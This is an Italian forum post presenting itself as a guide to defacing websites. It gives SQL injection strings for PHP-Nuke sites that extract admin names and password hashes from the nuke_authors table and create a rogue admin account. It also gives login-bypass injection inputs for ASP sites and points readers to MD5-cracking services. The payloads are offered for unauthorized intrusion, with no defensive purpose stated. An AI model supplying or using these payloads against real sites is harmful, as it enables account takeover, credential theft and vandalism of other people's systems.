Salve,posto una guida su come defacciare i seguenti portali:
PHP Site
PHP-Nuke Site
ASP Site
PHPBB
PHPBB2 Forum
JPortal
GuestBook
Invision PowerBoard
Powered by FrontPage
_____________________|
________________________________________|
PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;
Exploit – Modulo Cerca
Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.
Exploit – Top10
Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit:
[Devi essere iscritto e connesso per vedere questo link]%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.
Exploit – Sql Injection
Scriviamo nella barra degli indirizzi la stringa:
[Devi essere iscritto e connesso per vedere questo link]Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.
Con la stringa
[Devi essere iscritto e connesso per vedere questo link] si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass
___________________________|
ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root
Diventare Utenti senza Neanche registrarsi:
UserName: apostrofo
Password: [nessuna password, lasciate vuoto]
Accedere da Admin:
UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’—
Password: [nessuna password]
Diventare automaticamente amministratori
UserName: admin’ –
Password: [nessuna pass]
Primo utente nella lista
UserName: ‘ or 0=0 –sp_password
Password: [nessuna pass]
_________________________________|
____|Qualke sito per decriptare psw in md5|_____
[Devi essere iscritto e connesso per vedere questo link]Guida by : Web
spero di esservi stato utile bye
Scusate ma non entravano gli altri deface